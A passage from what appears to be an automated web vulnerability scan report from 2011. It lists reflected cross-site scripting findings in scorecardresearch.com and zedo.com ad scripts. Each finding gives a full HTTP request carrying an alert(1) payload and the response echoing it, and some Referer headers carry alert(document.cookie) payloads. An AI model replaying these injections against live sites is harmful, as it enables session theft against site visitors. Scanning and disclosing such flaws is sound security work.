{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"2", c2:"6035786", c3:"603578626bb2<script>alert(1)</script>dadffb12f82", c4:"", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});

4.10. http://b.scorecardresearch.com/beacon.js [c4 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c4 request parameter is copied into the HTML document as plain text between tags. The payload f09c8<script>alert(1)</script>b3efd23cef2 was submitted in the c4 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=2&c2=6035786&c3=6035786&c4=f09c8<script>alert(1)</script>b3efd23cef2&c5=&c6=&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/results.aspx?keyword=law+offices&CID=2531/x22b7005%22style%3d%22x%3aexpression(alert(document.cookie))%22e433a090613
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Wed, 26 Jan 2011 17:59:29 GMT
Date: Wed, 19 Jan 2011 17:59:29 GMT
Connection: close
Content-Length: 3587

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"2", c2:"6035786", c3:"6035786", c4:"f09c8<script>alert(1)</script>b3efd23cef2", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});

4.11. http://b.scorecardresearch.com/beacon.js [c5 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c5 request parameter is copied into the HTML document as plain text between tags. The payload 77439<script>alert(1)</script>58583c10800 was submitted in the c5 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=7&c2=5964888&c3=2&c4=&c5=77439<script>alert(1)</script>58583c10800&c6=&c15=&tm=919330 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Wed, 26 Jan 2011 17:59:32 GMT
Date: Wed, 19 Jan 2011 17:59:32 GMT
Connection: close
Content-Length: 3581

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"7", c2:"5964888", c3:"2", c4:"", c5:"77439<script>alert(1)</script>58583c10800", c6:"", c10:"", c15:"", c16:"", r:""});

4.12. http://b.scorecardresearch.com/beacon.js [c6 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c6 request parameter is copied into the HTML document as plain text between tags. The payload 147af<script>alert(1)</script>202194faed4 was submitted in the c6 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=7&c2=5964888&c3=2&c4=&c5=&c6=147af<script>alert(1)</script>202194faed4&c15=&tm=919330 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Wed, 26 Jan 2011 17:59:34 GMT
Date: Wed, 19 Jan 2011 17:59:34 GMT
Connection: close
Content-Length: 3581

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"7", c2:"5964888", c3:"2", c4:"", c5:"", c6:"147af<script>alert(1)</script>202194faed4", c10:"", c15:"", c16:"", r:""});

4.13. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js [$ parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-401/d3/jsc/fm.js

Issue detail

The value of the $ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload daf00'%3balert(1)//9a4146cf137 was submitted in the $ parameter. This input was echoed as daf00';alert(1)//9a4146cf137 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-401/d3/jsc/fm.js?c=2/1&a=0&f=&n=1099&r=13&d=14&q=&$=daf00'%3balert(1)//9a4146cf137&s=1&l=http%3A//adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBMES1Ugg3Ta2nBoyGlges6NynDJnp180BAAAAEAEgjfDlBTgAWKHYjIMWYMmGo4fUo4AQsgERd3d3LmNzbW9uaXRvci5jb226AQk3Mjh4OTBfYXPIAQnaAZIBaHR0cDovL3d3dy5jc21vbml0b3IuY29tL1VTQTFlZGMxJTIyLWFsZXJ0KGRvY3VtZW50LmNvb2tpZSktJTIyOGE1ZTYzNWQ0OC9KdXN0aWNlLzIwMTEvMDExOC9TdXByZW1lLUNvdXJ0LWRlY2xpbmVzLWFwcGVhbC1vZi1ELkMuLWdheS1tYXJyaWFnZS1sYXeYAvQDwAIC4AIA6gIPNzI4eDkwQV9HZW5lcmFs-AL40R6QA-gCmAOkA6gDAeAEAQ%26num%3D0%26sig%3DAGiWqtxRwj24JAE0NIGlaKp_ZowzoLsPwg%26client%3Dca-pub-6743622525202572%26adurl%3D&z=0.14485870278440416 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.csmonitor.com/USA1edc1%22-alert(document.cookie)-%228a5e635d48/Justice/2011/0118/Supreme-Court-declines-appeal-of-D.C.-gay-marriage-law
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; FFgeo=5386156; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1; FFCap=1463B1219,174796|0,11,1

Response (redirected)

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1099:daf00';alert(1)//9a4146cf137;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1099,2,14;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "812b9fe7-809a-4989a59833840"
Vary: Accept-Encoding
X-Varnish: 2233582316
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=524
Expires: Wed, 19 Jan 2011 18:09:46 GMT
Date: Wed, 19 Jan 2011 18:01:02 GMT
Connection: close
Content-Length: 1990

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat=',daf00';alert(1)//9a4146cf137';var zzCustom='';
if(typeof zzStr=='undefined'){
var zzStr="q=,daf00';alert(1)//9a4146cf137;z="+Math.random();}

if(zzuid=='unknown')zzuid='INmz6woBADYAAHrQ5V4AAACH~010411';

var zzhasAd=undefined;



...[SNIP]...

4.14. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js [$ parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-401/d3/jsc/fm.js

Issue detail

The value of the $ request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1e01e"%3balert(1)//82425b7431e was submitted in the $ parameter. This input was echoed as 1e01e";alert(1)//82425b7431e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-401/d3/jsc/fm.js?c=2/1&a=0&f=&n=1099&r=13&d=14&q=&$=1e01e"%3balert(1)//82425b7431e&s=1&l=http%3A//adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBMES1Ugg3Ta2nBoyGlges6NynDJnp180BAAAAEAEgjfDlBTgAWKHYjIMWYMmGo4fUo4AQsgERd3d3LmNzbW9uaXRvci5jb226AQk3Mjh4OTBfYXPIAQnaAZIBaHR0cDovL3d3dy5jc21vbml0b3IuY29tL1VTQTFlZGMxJTIyLWFsZXJ0KGRvY3VtZW50LmNvb2tpZSktJTIyOGE1ZTYzNWQ0OC9KdXN0aWNlLzIwMTEvMDExOC9TdXByZW1lLUNvdXJ0LWRlY2xpbmVzLWFwcGVhbC1vZi1ELkMuLWdheS1tYXJyaWFnZS1sYXeYAvQDwAIC4AIA6gIPNzI4eDkwQV9HZW5lcmFs-AL40R6QA-gCmAOkA6gDAeAEAQ%26num%3D0%26sig%3DAGiWqtxRwj24JAE0NIGlaKp_ZowzoLsPwg%26client%3Dca-pub-6743622525202572%26adurl%3D&z=0.14485870278440416 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.csmonitor.com/USA1edc1%22-alert(document.cookie)-%228a5e635d48/Justice/2011/0118/Supreme-Court-declines-appeal-of-D.C.-gay-marriage-law
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; FFgeo=5386156; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1; FFCap=1463B1219,174796|0,11,1

Response (redirected)

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1099:1e01e";alert(1)//82425b7431e;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1099,2,14;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "812b9fe7-809a-4989a59833840"
Vary: Accept-Encoding
X-Varnish: 2233582316
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=524
Expires: Wed, 19 Jan 2011 18:09:46 GMT
Date: Wed, 19 Jan 2011 18:01:02 GMT
Connection: close
Content-Length: 1990

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat=',1e01e";alert(1)//82425b7431e';var zzCustom='';
if(typeof zzStr=='undefined'){
var zzStr="q=,1e01e";alert(1)//82425b7431e;z="+Math.random();}

if(zzuid=='unknown')zzuid='INmz6woBADYAAHrQ5V4AAACH~010411';

var zzhasAd=undefined;


                                                                                           var zzStr = "s=1
...[SNIP]...

4.15. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-401/d3/jsc/fm.js

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a19b1'-alert(1)-'4b1450f596b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-401/d3/jsc/fm.js?a19b1'-alert(1)-'4b1450f596b=1 HTTP/1.1
Host: d7.zedo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; FFgeo=5386156; ZCBC=1; aps=1; ZEDOIDX=29; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1; FFcat=933,56,15:1099,2,14; ZFFAbh=749B826,20|1483_749#365; FFad=0:0; FFCap=1463B1219,174796:933,196008|0,11,1:0,17,1;

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 941
Content-Type: application/x-javascript
Set-Cookie: FFad=0:0:0;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=0,0,0:933,56,15:1099,2,14;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "81ee0daa-82a5-4989a5927aac0"
X-Varnish: 2233582065 2233582057
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=253
Expires: Wed, 19 Jan 2011 18:11:59 GMT
Date: Wed, 19 Jan 2011 18:07:46 GMT
Connection: close

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();

p9.src='http://r1.zedo.com/ads2/p/'+Math.random()+'/ERR.gif?v=bar/v16-401/d3;referrer='+document.referrer+';tag=d7.zedo.com/bar/v16-401/d3/jsc/fm.js;qs=a19b1'-alert(1)-'4b1450f596b=1;';

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=0;var zzPat='';var zzCustom='';
if(typeof zzStr=='undefined'){
var zzStr="q=;z="+Math.random();}

if(
...[SNIP]...

4.16. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js [q parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-401/d3/jsc/fm.js

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fd682'%3balert(1)//8194c718852 was submitted in the q parameter. This input was echoed as fd682';alert(1)//8194c718852 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-401/d3/jsc/fm.js?c=2/1&a=0&f=&n=1099&r=13&d=14&q=fd682'%3balert(1)//8194c718852&$=&s=1&l=http%3A//adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBMES1Ugg3Ta2nBoyGlges6NynDJnp180BAAAAEAEgjfDlBTgAWKHYjIMWYMmGo4fUo4AQsgERd3d3LmNzbW9uaXRvci5jb226AQk3Mjh4OTBfYXPIAQnaAZIBaHR0cDovL3d3dy5jc21vbml0b3IuY29tL1VTQTFlZGMxJTIyLWFsZXJ0KGRvY3VtZW50LmNvb2tpZSktJTIyOGE1ZTYzNWQ0OC9KdXN0aWNlLzIwMTEvMDExOC9TdXByZW1lLUNvdXJ0LWRlY2xpbmVzLWFwcGVhbC1vZi1ELkMuLWdheS1tYXJyaWFnZS1sYXeYAvQDwAIC4AIA6gIPNzI4eDkwQV9HZW5lcmFs-AL40R6QA-gCmAOkA6gDAeAEAQ%26num%3D0%26sig%3DAGiWqtxRwj24JAE0NIGlaKp_ZowzoLsPwg%26client%3Dca-pub-6743622525202572%26adurl%3D&z=0.14485870278440416 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.csmonitor.com/USA1edc1%22-alert(document.cookie)-%228a5e635d48/Justice/2011/0118/Supreme-Court-declines-appeal-of-D.C.-gay-marriage-law
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; FFgeo=5386156; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1; FFCap=1463B1219,174796|0,11,1

Response (redirected)

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=0;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1099,2,14;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "812b9fe7-809a-4989a59833840"
Vary: Accept-Encoding
X-Varnish: 2233582316
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=526
Expires: Wed, 19 Jan 2011 18:09:46 GMT
Date: Wed, 19 Jan 2011 18:01:00 GMT
Connection: close
Content-Length: 1987

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat='fd682';alert(1)//8194c718852';var zzCustom='';
if(typeof zzStr=='undefined'){
var zzStr="q=fd682';alert(1)//8194c718852;z="+Math.random();}

if(zzuid=='unknown')zzuid='INmz6woBADYAAHrQ5V4AAACH~010411';

var zzhasAd=undefined;



...[SNIP]...

4.17. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js [q parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-401/d3/jsc/fm.js

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ae34c"%3balert(1)//b23cf797565 was submitted in the q parameter. This input was echoed as ae34c";alert(1)//b23cf797565 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-401/d3/jsc/fm.js?c=2/1&a=0&f=&n=1099&r=13&d=14&q=ae34c"%3balert(1)//b23cf797565&$=&s=1&l=http%3A//adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBMES1Ugg3Ta2nBoyGlges6NynDJnp180BAAAAEAEgjfDlBTgAWKHYjIMWYMmGo4fUo4AQsgERd3d3LmNzbW9uaXRvci5jb226AQk3Mjh4OTBfYXPIAQnaAZIBaHR0cDovL3d3dy5jc21vbml0b3IuY29tL1VTQTFlZGMxJTIyLWFsZXJ0KGRvY3VtZW50LmNvb2tpZSktJTIyOGE1ZTYzNWQ0OC9KdXN0aWNlLzIwMTEvMDExOC9TdXByZW1lLUNvdXJ0LWRlY2xpbmVzLWFwcGVhbC1vZi1ELkMuLWdheS1tYXJyaWFnZS1sYXeYAvQDwAIC4AIA6gIPNzI4eDkwQV9HZW5lcmFs-AL40R6QA-gCmAOkA6gDAeAEAQ%26num%3D0%26sig%3DAGiWqtxRwj24JAE0NIGlaKp_ZowzoLsPwg%26client%3Dca-pub-6743622525202572%26adurl%3D&z=0.14485870278440416 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.csmonitor.com/USA1edc1%22-alert(document.cookie)-%228a5e635d48/Justice/2011/0118/Supreme-Court-declines-appeal-of-D.C.-gay-marriage-law
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; FFgeo=5386156; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1; FFCap=1463B1219,174796|0,11,1

Response (redirected)

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFChanCap=1479B1099,2#702971|0,1,1;expires=Fri, 18 Feb 2011 18:00:59 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=1099,2,14;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "812b9fe7-809a-4989a59833840"
Vary: Accept-Encoding
X-Varnish: 2233582316
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=527
Expires: Wed, 19 Jan 2011 18:09:46 GMT
Date: Wed, 19 Jan 2011 18:00:59 GMT
Connection: close
Content-Length: 2035

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat='ae34c";alert(1)//b23cf797565';var zzCustom='';
if(typeof zzStr=='undefined'){
var zzStr="q=ae34c";alert(1)//b23cf797565;z="+Math.random();}

if(zzuid=='unknown')zzuid='INmz6woBADYAAHrQ5V4AAACH~010411';

var zzhasAd=undefined;


                           var zzStr = "s=1;u=INmz6woBADYAAHrQ5V4AAACH~010411;z=
...[SNIP]...

4.18. http://d7.zedo.com/bar/v16-401/d3/jsc/fmr.js [$ parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-401/d3/jsc/fmr.js

Issue detail

The value of the $ request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 35817"%3balert(1)//c76b7e8cf54 was submitted in the $ parameter. This input was echoed as 35817";alert(1)//c76b7e8cf54 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-401/d3/jsc/fmr.js?c=2/1&a=0&f=&n=1099&r=13&d=14&q=&$=35817"%3balert(1)//c76b7e8cf54&s=1&l=http%3A//adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBMES1Ugg3Ta2nBoyGlges6NynDJnp180BAAAAEAEgjfDlBTgAWKHYjIMWYMmGo4fUo4AQsgERd3d3LmNzbW9uaXRvci5jb226AQk3Mjh4OTBfYXPIAQnaAZIBaHR0cDovL3d3dy5jc21vbml0b3IuY29tL1VTQTFlZGMxJTIyLWFsZXJ0KGRvY3VtZW50LmNvb2tpZSktJTIyOGE1ZTYzNWQ0OC9KdXN0aWNlLzIwMTEvMDExOC9TdXByZW1lLUNvdXJ0LWRlY2xpbmVzLWFwcGVhbC1vZi1ELkMuLWdheS1tYXJyaWFnZS1sYXeYAvQDwAIC4AIA6gIPNzI4eDkwQV9HZW5lcmFs-AL40R6QA-gCmAOkA6gDAeAEAQ%26num%3D0%26sig%3DAGiWqtxRwj24JAE0NIGlaKp_ZowzoLsPwg%26client%3Dca-pub-6743622525202572%26adurl%3D&z=0.14485870278440416 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.csmonitor.com/USA1edc1%22-alert(document.cookie)-%228a5e635d48/Justice/2011/0118/Supreme-Court-declines-appeal-of-D.C.-gay-marriage-law
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; FFgeo=5386156; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1; FFCap=1463B1219,174796|0,11,1; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1099:35817";alert(1)//c76b7e8cf54;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1099,2,14;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1;expires=Fri, 18 Feb 2011 18:00:52 GMT;path=/;domain=.zedo.com;
ETag: "812b9fe7-809a-4989a59833840"
Vary: Accept-Encoding
X-Varnish: 2233582316
